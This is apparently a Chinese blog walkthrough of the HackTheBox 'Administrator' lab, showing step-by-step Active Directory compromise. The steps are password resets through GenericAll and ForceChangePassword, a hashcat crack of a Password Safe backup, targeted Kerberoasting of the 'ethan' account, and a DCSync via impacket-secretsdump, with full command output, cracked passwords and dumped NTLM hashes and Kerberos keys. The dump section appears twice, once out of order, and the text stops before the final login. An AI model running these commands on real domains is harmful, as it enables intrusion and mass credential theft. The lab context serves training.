当前位置: 首页 > article >正文

HTB--Administrator

文章目录

    • 靶机信息
    • 域环境初步信息收集与权限验证
      • FTP 登录尝试
      • SMB 枚举尝试
      • WinRM 登录olivia
      • 域用户枚举
    • 获取Michael权限
      • BloodHound 提取域信息
      • GenericAll
    • 获取Benjamin权限
      • ForceChangePassword
      • ftp登录benjamin
    • 获取Emily权限
      • pwsafe+hashcat
    • 获取Ethan权限
    • 获取管理员(Administrator)权限

HTB–Administrator

靶机信息

一台windows机器 难度:medium

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich

用户名:Olivia
密码:ichliebedich

目标:获得一个用户flag和一个管理员flag


域环境初步信息收集与权限验证

首先通过 Nmap 扫描所有端口,确定其开放的服务和潜在入口点

┌──(root㉿kali)-[/HTB/Administrator]
└─# nmap --min-rate 10000 -p- 10.10.11.42
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 15:38 CST
Nmap scan report for 10.10.11.42
Host is up (0.17s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-13 20:17:12Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

FTP 登录尝试

利用所给的账户名'Olivia'和密码'ichliebedich',尝试ftp登录,但由于 “Home directory inaccessible” 的错误,FTP 登录失败

┌──(root㉿kali)-[/HTB/Administrator]
└─# ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:kali): Olivia
331 Password required
Password: 
530 User cannot log in, home directory inaccessible.
ftp: Login failed

SMB 枚举尝试

SMB 是一种网络文件共享协议,允许应用程序通过网络读取和写入文件、请求远程服务以及进行其他网络操作。

利用提供的账号密码,使用CrackMapExec工具对 SMB 服务进行枚举,验证提供的凭据是否可用,并查看是否存在有用的共享目录。

CrackMapExec 是一个常用的渗透测试工具,主要用于 Windows 网络的枚举和利用。它特别适合对 SMB、RDP 和 WinRM 服务进行广泛扫描、认证、执行命令和枚举共享目录等操作

结果显示,用户 Olivia 的 SMB 登录有效,但未发现有用的共享目录,仅能读取常见的 NETLOGONSYSVOL

┌──(root㉿kali)-[/HTB/Administrator]
└─# crackmapexec smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --shares
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\Olivia:ichliebedich 
SMB         10.10.11.42     445    DC               [+] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share 

WinRM 登录olivia

WinRM 是 Microsoft 提供的远程管理协议,允许远程执行命令、启动进程、管理系统设置等,类似于 Unix 系统中的 SSH

使用 CrackMapExec 验证目标主机的WinRM 服务(端口 5985),发现凭据有效并成功登录。

返回结果表明可以通过 WinRM 获取远程访问权限

┌──(root㉿kali)-[/HTB/Administrator]
└─# crackmapexec winrm 10.10.11.42 -u 'Olivia' -p 'ichliebedich'     
SMB         10.10.11.42     5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP        10.10.11.42     5985   DC               [*] http://10.10.11.42:5985/wsman
WINRM       10.10.11.42     5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)

使用evil-winrm登录,使用 evil-winrm 进一步获取目标主机的权限和用户信息

并且通过运行 whoami /all 命令查看用户权限

┌──(root㉿kali)-[/home/kali/Desktop]
└─# evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'
*Evil-WinRM* PS C:\Users\olivia\Documents> whoami /all
----------------

User Name            SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

结果发现 Olivia 用户具有基本的操作权限,并且拥有 SeMachineAccountPrivilege,允许其将计算机帐户添加到域中。

域用户枚举

成功登录目标主机后,使用 net user 命令对域内的用户进行枚举。列出当前域控制器上存在的所有用户账户。

*Evil-WinRM* PS C:\Users\olivia\Documents> net user

User accounts for \\
-------------------------------------------------------------------------------
Administrator            alexander                benjamin
emily                    emma                     ethan
Guest                    krbtgt                   michael
olivia

olivia为当前使用的用户,其余为域内的其他用户


获取Michael权限

BloodHound 提取域信息

使用工具bloodhound.py从域中提取信息

BloodHound工具链接:https://github.com/BloodHoundAD/BloodHound/releases

┌──(root㉿kali)-[/HTB/Administrator]
└─# python /HTB/BloodHound/bloodhound.py -d administrator.htb -ns 10.10.11.42 -u 'olivia' -p ichliebedich -c All --zip
NFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 01M 30S
INFO: Compressing output into 20241205094659_bloodhound.zip

运行此命令后,我们获得了压缩包 20241205094659_bloodhound.zip,它包含了域中的所有关键信息。接下来,我们使用sudo neo4j start命令启动数据库,并使用 bloodbound 命令进入工具。将得到的zip压缩包拖入到Bloodhound中上传文件。

我们当前用户为olivia,因此查看一下节点信息,olivia有一个First Degreee object control(一级对象控制,接下来简称FDOC),点击它可以看到olivia对用户michael拥有GenericAll权限

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

GenericAll

GenericAll 权限相当于“完全控制”权限,意味着 olivia 可以完全控制 michael 用户,包括修改密码和组成员等操作。

使用evil-winrm登录olivia用户,修改域内用户michael的密码为michael

*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael michael /domain
The command completed successfully.

成功登录,拿下michael用户

┌──(root㉿kali)-[/HTB/Administrator]
└─# evil-winrm -i 10.10.11.42 -u 'michael' -p 'michael'
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael

获取Benjamin权限

ForceChangePassword

打开bloodhound,查看michael用户,发现该用户也有一个FDOC,并且该FDOC对benjamin用户具有ForceChangePassword权限,即可以强制更改benjamin的密码。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

ftp登录benjamin

bloodhound中查看benjamin没有任何权限,但是他是share Moderator组的成员,可以尝试一下ftp连接

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

接下来使用ftp登录michael账户,

┌──(root㉿kali)-[/HTB/Administrator]
└─# rpcclient -U michael 10.10.11.42
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 'benjamin'
rpcclient $> exit

┌──(root㉿kali)-[/HTB/Administrator]
└─# ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp>

成功拿下benjamin权限


获取Emily权限

ftp登录之后,查看一下当前目录下的文件,发现一个备份文件Backup.psafe3,将它下载下来

ftp> dir
ftp> binary  #切换成二进制模式传输文件
200 Type set to I.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||51246|)
125 Data connection already open; Transfer starting.
100% |**********************************************************************************************|   952        0.77 KiB/s    00:00 ETA
226 Transfer complete.
952 bytes received in 00:01 (0.77 KiB/s)

pwsafe+hashcat

接下来使用pwsafe打开文件,发现需要密码

pwsafe工具链接:https://github.com/pwsafe/pwsafe/releases

使用hashcatpsafe3选项,同时时候5200模式进行破解。字典选择rockyou

rockyou字典链接:https://github.com/zacheller/rockyou

┌──(root㉿kali)-[/HTB/Administrator]
└─# hashcat -m 5200 Backup.psafe3 rockyou.txt
hashcat (v6.2.6) starting                                                                                                                                                           
Dictionary cache built:
* Filename..: rockyou.txt                                                                
* Passwords.: 14344391                                                                            
* Bytes.....: 139921497                                                                             
* Keyspace..: 14344384                                                                             
* Runtime...: 1 sec           

Backup.psafe3:tekieromucho                                

成功爆破出密码:tekieromucho,里面保存了用户alexanderemilyemma的密码

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

得到emily的密码为:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

使用evil-winrm登录emily用户

┌──(root㉿kali)-[/HTB/Administrator]
└─# evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily

成功拿下emily权限,进入桌面目录,拿下第一个flag

*Evil-WinRM* PS C:\Users\emily\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> dir

    Directory: C:\Users\emily\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk
-ar---         12/7/2024  12:20 AM             34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
888ac3b3d60b08fa502ca90c9e90d506

获取Ethan权限

再次查看bloodhoundemily有一个FDOC,对用户ethan拥有GenericWrite权限。

在 Active Directory (AD) 环境中,GenericWrite 是一种权限,允许攻击者对目标账户的属性进行修改。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

这里介绍一下Kerberoasting攻击

Kerberos 协议在处理身份验证时,允许域内用户为拥有 SPN(Service Principal Name,标识服务实例的唯一名称) 的账户请求服务票据。

这些票据通常是由账户的 NTLM 哈希加密生成的,只要域账户注册了SPN,攻击者就可以使用Kerberos请求服务票据并提取票据。因此攻击者可以通过离线破解服务票据(例如使用工具 PowerViewGetUserSPNs.py)间接得到目标账户的密码。

但是这里我们没有看到ethan用户注册SPN,因此我们只能通过GenericWriteethan用户创建一个SPN,然后请求一个票据并使用targetedKerberoast.py破解它。

targetedKerberoast.py下载链接:https://github.com/ShutdownRepo/targetedKerberoast

先更新一下时间,不然会有时差,导致破解失败

┌──(root㉿kali)-[/HTB/Administrator]
└─# ntpdig 10.10.11.42 
2024-12-07 19:24:32.486796 (+0800) +57577.625273 +/- 0.706782 10.10.11.42 s1 no-leap
                                                                                   
┌──(root㉿kali)-[/HTB/Administrator]
└─# ntpdate 10.10.11.42
2024-12-07 19:24:41.787024 (+0800) +57578.378741 +/- 0.419693 10.10.11.42 s1 no-leap
CLOCK: time stepped by 57578.378741                     

接下来进行破解

┌──(root㉿kali)-[/HTB/Administrator]
└─# python targetedKerberoast.py -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$049e887c457cf593f6585938d813f0e9$e52df94e29cff8fd07770680c4272fe8dca87da8fd11e36c2167e2c9abcd3b1e5e24227211f06ed8277388f30a0b935ed733f1eaf9d2fd5340e8e5b19fd51e7825d8059a6fffab4d0644edca80a778a17cf688e7077efee48fe36a0530d5e713ef48b08f2c44c2cd556614e598a575d6c303f7cb8653e6ec224e4d94eff3fa7ae48a18cc155dfbc938d6f8c33ec6a9765f1cdbacaa585b59611a54088ccec70d450cea352631f602c12cdf2626b9642145806842cd86220632bf1c0332501683640a749d5dc579d74ce433ce6440fa0ef4269d23131e0b75c25c22cc71a96bdbe972caf10d594fb8b9996eefc45dd2465fcb00c2c407aefaae2e107e4a9e3e643dd4937392ce935f8095f9f38cd7772266cad8ca827707967db5bbef143285a424965157937436208b3862e5560b2bd65a220e38c99414aa2dbee9efc0dd30863df2f239c63896a77b69b132f68416efcb7e9b384c8e8ebe9346f4a49eedec7470414459d3cdc096d4743ad4f194b30c44cd7e70aa297cfd628a3033c37725dbd9a4152fbb218b62d51a118f70eca8d893b50af2740763d0738852f9c192bc7396f653ff093256103b22874762e7d24fd5b2331e4524f32e8c1c9f00e9d88ba44017dddf86483bb076776de00d0779f5760be3979fb7af5a9807f297dcbdc2b77be04a076fb64a508b375a05b19088dad070771529fdc6b039f014214276a991eef28734b6fbc919c0972e12189487e824a35bd9e94bf6c61e7a274f1eb90569c9e2c0c7c96b5c75e9d084f8f426b9b769f5a61961a03184357309acc34f7cd8ba64c800c0303357644e6f844575cc9ed989b17cf91c1ffcc6bd0b4524927708c024868eb86cf5d9a28ca47dcbbbb2204d7836d4aee434c8e306efa14b0ce84983d489978809d3152780493b3c5ee908cf9d1d76ce7923d8c42f70c1ce78e73bfe45eb9c7a55e4906653d272720a2fcf2b92789c5a70f3306ade5a0dcedc86accf69bf25f40dc45cb70fc6f3eb166283e4380023a59639a99041803e0b9b013463b996f4c9ffc860f2498ba21bf8a4388592056b41522639c97b13c9809625bf8223c86c2e43ddd1c28d005dcdec42c5569e1a1e037a6987788c4a4cf549f66fd9a49fe1cecce548774c540e16633c7583eb26f16161900ab98c5abc652fb49a045f93a514740a3f5fc4eec9ecb59b23f6f96e96fb3b0b8a830c3746f99117b942246fcf0ddd10ef5e3472ad230f10eee854e371f6abd5e47a5d4f434b64ce3ab624e0ec2ecdd22c2e706611bc7f5a428ba5dd9d5b89c596b96436ee1a44e0f911bf923a0395d8225c59d9698fe52ac37850927d216eac82fe88e8acb5c4cc13cf2346694407698fce8449922d6cfc02192f3b415161f51e3f43355ed9619aeeff9b790950c50b23ef35961fcc6190fad445ceb02e757d5b18ef6238f092518429e2a45c71388371d6a6079f15c5a9cbb4baa03a850e217b2ab74ed9e6f1c3589dbae62495368360099394563b0679aaf4726968be9efe2f940c530155890b

现在有了krb5t哈希值,使用hashcat破解一下

┌──(root㉿kali)-[/HTB/Administrator]
└─# hashcat krb5t rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$049e887c457cf593f6585938d813f0e9$e52df94e29cff8fd07770680c4272fe8dca87da8fd11e36c2167e2c9abcd3b1e5e24227211f06ed8277388f30a0b935ed733f1eaf9d2fd5340e8e5b19fd51e7825d8059a6fffab4d0644edca80a778a17cf688e7077efee48fe36a0530d5e713ef48b08f2c44c2cd556614e598a575d6c303f7cb8653e6ec224e4d94eff3fa7ae48a18cc155dfbc938d6f8c33ec6a9765f1cdbacaa585b59611a54088ccec70d450cea352631f602c12cdf2626b9642145806842cd86220632bf1c0332501683640a749d5dc579d74ce433ce6440fa0ef4269d23131e0b75c25c22cc71a96bdbe972caf10d594fb8b9996eefc45dd2465fcb00c2c407aefaae2e107e4a9e3e643dd4937392ce935f8095f9f38cd7772266cad8ca827707967db5bbef143285a424965157937436208b3862e5560b2bd65a220e38c99414aa2dbee9efc0dd30863df2f239c63896a77b69b132f68416efcb7e9b384c8e8ebe9346f4a49eedec7470414459d3cdc096d4743ad4f194b30c44cd7e70aa297cfd628a3033c37725dbd9a4152fbb218b62d51a118f70eca8d893b50af2740763d0738852f9c192bc7396f653ff093256103b22874762e7d24fd5b2331e4524f32e8c1c9f00e9d88ba44017dddf86483bb076776de00d0779f5760be3979fb7af5a9807f297dcbdc2b77be04a076fb64a508b375a05b19088dad070771529fdc6b039f014214276a991eef28734b6fbc919c0972e12189487e824a35bd9e94bf6c61e7a274f1eb90569c9e2c0c7c96b5c75e9d084f8f426b9b769f5a61961a03184357309acc34f7cd8ba64c800c0303357644e6f844575cc9ed989b17cf91c1ffcc6bd0b4524927708c024868eb86cf5d9a28ca47dcbbbb2204d7836d4aee434c8e306efa14b0ce84983d489978809d3152780493b3c5ee908cf9d1d76ce7923d8c42f70c1ce78e73bfe45eb9c7a55e4906653d272720a2fcf2b92789c5a70f3306ade5a0dcedc86accf69bf25f40dc45cb70fc6f3eb166283e4380023a59639a99041803e0b9b013463b996f4c9ffc860f2498ba21bf8a4388592056b41522639c97b13c9809625bf8223c86c2e43ddd1c28d005dcdec42c5569e1a1e037a6987788c4a4cf549f66fd9a49fe1cecce548774c540e16633c7583eb26f16161900ab98c5abc652fb49a045f93a514740a3f5fc4eec9ecb59b23f6f96e96fb3b0b8a830c3746f99117b942246fcf0ddd10ef5e3472ad230f10eee854e371f6abd5e47a5d4f434b64ce3ab624e0ec2ecdd22c2e706611bc7f5a428ba5dd9d5b89c596b96436ee1a44e0f911bf923a0395d8225c59d9698fe52ac37850927d216eac82fe88e8acb5c4cc13cf2346694407698fce8449922d6cfc02192f3b415161f51e3f43355ed9619aeeff9b790950c50b23ef35961fcc6190fad445ceb02e757d5b18ef6238f092518429e2a45c71388371d6a6079f15c5a9cbb4baa03a850e217b2ab74ed9e6f1c3589dbae62495368360099394563b0679aaf4726968be9efe2f940c530155890b:limpbizkit

借助DCSync,使用impacket-secretsdump转储域控制器上的所有密码

┌──(root㉿kali)-[/HTB/Administrator]
└─# impacket-secretsdump ethan:limpbizkit@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:572eda5f1e26af9507cbe100f5e05f70:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:572eda5f1e26af9507cbe100f5e05f70:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:8dc537c77bd919cc78dd0a50c96ddb84e9cd05b3dfe1746606cf781b2d2b034c
administrator.htb\michael:aes128-cts-hmac-sha1-96:5431bff0c178b1929b1d3f75df76e610
administrator.htb\michael:des-cbc-md5:2a4c9b1a6802072a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:9bb89823c8c2b20787ae2a3f5078b9c1660de5df5e13fb10cfc29d2634b98676
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:bdd3ca10646fdaaa820dabcf80248d0c
administrator.htb\benjamin:des-cbc-md5:cbeabaa2dae343a2
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up... 

获取管理员(Administrator)权限

现在我们已经获取了 ethan 的密码,使用 BloodHound 检查他的权限。发现 ethan 的 FDOC权限间接赋予了他在域控制器 (Domain Controller, DC) 上的 DCSync权限。

DCSync 是一种滥用 Active Directory (AD) 复制机制的攻击技术。拥有 DCSync 权限的用户可以模拟域控制器,向其他 DC 请求复制敏感数据,如 NTLM 哈希和 Kerberos 密钥。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

借助DCSync,使用impacket-secretsdump转储域控制器上的所有密码

┌──(root㉿kali)-[/HTB/Administrator]
└─# impacket-secretsdump ethan:limpbizkit@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:572eda5f1e26af9507cbe100f5e05f70:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:572eda5f1e26af9507cbe100f5e05f70:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:8dc537c77bd919cc78dd0a50c96ddb84e9cd05b3dfe1746606cf781b2d2b034c
administrator.htb\michael:aes128-cts-hmac-sha1-96:5431bff0c178b1929b1d3f75df76e610
administrator.htb\michael:des-cbc-md5:2a4c9b1a6802072a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:9bb89823c8c2b20787ae2a3f5078b9c1660de5df5e13fb10cfc29d2634b98676
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:bdd3ca10646fdaaa820dabcf80248d0c
administrator.htb\benjamin:des-cbc-md5:cbeabaa2dae343a2
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up... 

现在已经拥有了Administrator的哈希值,使用evil-winrm登录

┌──(root㉿kali)-[/home/kali/Desktop/secretsdump.py-main]
